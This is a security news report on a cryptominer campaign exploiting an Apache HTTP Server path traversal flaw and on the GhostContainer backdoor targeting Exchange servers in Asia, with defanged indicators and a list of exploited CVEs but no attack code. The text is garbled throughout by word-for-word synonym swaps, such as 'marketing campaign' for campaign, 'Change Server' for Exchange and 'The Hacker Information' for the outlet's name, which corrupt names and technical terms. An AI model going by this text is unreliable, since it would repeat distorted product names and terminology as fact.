Jul 17, 2025Ravie LakshmananCryptocurrency / Vulnerability
Cybersecurity researchers have found a brand new marketing campaign that exploits a recognized safety flaw impacting Apache HTTP Server to ship a cryptocurrency miner referred to as Linuxsys.
The vulnerability in query is CVE-2021-41773 (CVSS rating: 7.5), a high-severity path traversal vulnerability in Apache HTTP Server model 2.4.49 that might lead to distant code execution.
“The attacker leverages compromised reliable web sites to distribute malware, enabling stealthy supply and evasion of detection,” VulnCheck stated in a report shared with The Hacker Information.
The an infection sequence, noticed earlier this month and originating from an Indonesian IP tackle 103.193.177[.]152, is designed to drop a next-stage payload from “repositorylinux[.]org” utilizing curl or wget.
The payload is a shell script that is accountable for downloading the Linuxsys cryptocurrency miner from 5 totally different reliable web sites, suggesting that the menace actors behind the marketing campaign have managed to compromise third-party infrastructure to facilitate the distribution of the malware.
“This strategy is intelligent as a result of victims connect with reliable hosts with legitimate SSL certificates, making detection much less possible,” VulnCheck famous. “Moreover, it supplies a layer of separation for the downloader web site (‘repositorylinux[.]org’) because the malware itself is not hosted there.”
The websites additionally host one other shell script named “cron.sh” that ensures that the miner is launched routinely upon a system reboot. Cybersecurity agency stated it additionally recognized two Home windows executables on the hacked websites, elevating the likelihood that the attackers are additionally going after Microsoft’s desktop working system.
It is value noting that assaults distributing the Linuxsys miner have beforehand exploited a vital safety flaw in OSGeo GeoServer GeoTools (CVE-2024-36401, CVSS rating: 9.8), as documented by Fortinet FortiGuard Labs in September 2024.
Curiously, the shell script dropped following the exploitation of the flaw was downloaded from “repositorylinux[.]com,” with feedback within the supply code written in Sundanese, an Indonesian language. The identical shell script has been detected within the wild way back to December 2021.
A few of the different vulnerabilities exploited to ship the miner lately embody –
CVE-2023-22527, a template injection vulnerability in Atlassian Confluence Knowledge Heart and Confluence Server
CVE-2023-34960, a command injection vulnerability in Chamilo Studying Administration Programs (LMS)
CVE-2023-38646, a command injection vulnerability in Metabase
CVE-2024-0012 and CVE-2024-9474, are authentication bypass and privilege escalation vulnerabilities in Palo Alto Networks firewalls
“All of this means that the attacker has been conducting a long-term marketing campaign, using constant methods equivalent to n-day exploitation, staging content material on compromised hosts, and coin mining on sufferer machines,” VulnCheck stated.
“A part of their success comes from cautious concentrating on. They seem to keep away from low interplay honeypots and require excessive interplay to look at their exercise. Mixed with using compromised hosts for malware distribution, this strategy has largely helped the attacker keep away from scrutiny.”
Change Servers Focused by GhostContainer Backdoor
The event comes as Kaspersky disclosed particulars of a marketing campaign that is concentrating on authorities entities in Asia, possible with a N-day safety flaw in Microsoft Change Server, to deploy a bespoke backdoor dubbed GhostContainer. It is suspected that the assaults could have exploited a now-patched distant code execution bug in Change Server (CVE-2020-0688, CVSS rating: 8.8).
The “refined, multi-functional backdoor” may be “dynamically prolonged with arbitrary performance by way of the obtain of further modules,” the Russian firm stated, including “the backdoor grants the attackers full management over the Change server, permitting them to execute a variety of malicious actions.”
The malware is supplied to parse directions that may execute shellcode, obtain information, learn or delete information, run arbitrary instructions, and cargo further .NET byte code. It additionally incorporates an internet proxy and tunneling module.
It is suspected that the exercise could have been a part of a sophisticated persistent menace (APT) marketing campaign geared toward high-value organizations, together with high-tech corporations, in Asia.
Not a lot is thought about who’s behind the assaults, though they’re assessed to be extremely expert owing to their in-depth understanding of Microsoft Change Server and their skill to rework publicly out there code into superior espionage instruments.
“The GhostContainer backdoor doesn’t set up a connection to any [command-and-control] infrastructure,” Kaspersky stated. “As a substitute, the attacker connects to the compromised server from the surface, and their management instructions are hidden inside regular Change internet requests.”
Discovered this text attention-grabbing? Observe us on Twitter and LinkedIn to learn extra unique content material we publish.
